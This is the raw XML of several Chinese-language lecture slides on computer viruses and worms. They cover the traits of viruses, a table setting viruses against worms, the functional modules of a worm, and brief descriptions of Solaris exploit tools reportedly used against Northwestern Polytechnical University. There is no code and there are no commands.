              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>功能或者数据或者网络功能（消耗内存或网络带宽）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自我复制能力（传播性）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，很强的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>感染性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，一定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>潜伏性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隐蔽性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>触发性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>和很大的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>破坏性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>病毒可以随着U盘、邮件、网站、共享文件等网络传输方式或者媒介</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>到其他机器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>典型的蠕虫病毒有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>尼姆达、震荡波、熊猫烧香</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>等。</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59105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计算机病毒与蠕虫病毒的区别</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1172530" name="Group 50"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2215198" y="1063625"/>
          <a:ext cx="8218487" cy="5401056"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2740025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2738437">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2740025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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600" b="1"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>狭义病毒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600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>蠕虫病毒</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rgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>存在形式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寄生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独立个体</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rgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>复制机制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插入到宿主程序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自身的拷贝</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rgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>传染机制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宿主程序运行</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系统存在漏洞</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rgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>传染目标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针对本地文件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网络上其它计算机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rgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>触发传染</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计算机使用者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程序自身</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rgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>影响重点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文件系统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网络性能、系统性能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rgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>计算机使用者角色</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病毒传播中关键环节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无关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rgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>防治措施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从宿主文件中摘除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为系统打补丁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rgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>对抗主体</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计算机使用者、</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防病毒厂商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系统提供商、</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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>网络管理人员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346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蠕虫程序功能模型图</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="185350" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572703" y="1034098"/>
            <a:ext cx="7772400" cy="4467225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174534" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5957253" y="2042160"/>
            <a:ext cx="1944688" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79551"/>
              <a:gd name="adj2" fmla="val 72329"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>复制传播流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174535" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5957253" y="2691448"/>
            <a:ext cx="2016125" cy="719138"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 61417"/>
              <a:gd name="adj2" fmla="val -48676"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>更强的生存能力和破坏能力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74534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1174534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1174534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="117453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74535"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1174535"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1174535"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1174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4534" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="1174535"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蠕虫程序功能</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988185" y="857250"/>
            <a:ext cx="9587865" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>搜索模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：寻找下一台要传染的计算机；为了提高搜索效率，可以采用一系列的搜索算法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：在被感染的计算机上建立传输通道（传染途径）；为减少第一次传染数据传输量，可以采用引导式结构。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传输模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：计算机间的蠕虫程序复制。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>信息搜索模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：搜索和建立被传染计算机上的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>繁殖模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：建立自身的多个副本；在同一台计算机上提高传染效率、判断避免重复传染</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隐藏模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：隐藏蠕虫程序，使简单的检测不能发现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>破坏模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：摧毁或破坏被感染计算机，或在被感染的计算机上留下后门程序等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通信模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：蠕虫间、蠕虫同黑客之间进行交流，可能是未来蠕虫发展的侧重点。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>控制模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：调整蠕虫行为，更新其他功能模块，控制被感染计算机。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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TAO在对西北工业大学的网络攻击武器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4451985" y="1792605"/>
            <a:ext cx="1434465" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>突破类武器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292100" y="1248410"/>
            <a:ext cx="4159885" cy="3745865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>剃须刀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Solarise系统实施远程漏洞攻击，攻击时可自动探知目标系统服务开放情况并智能化选择合适版本的漏洞利用代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>孤岛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：Solaris系统实施远程溢出攻击，直接获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>对目标主机的完整控制权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
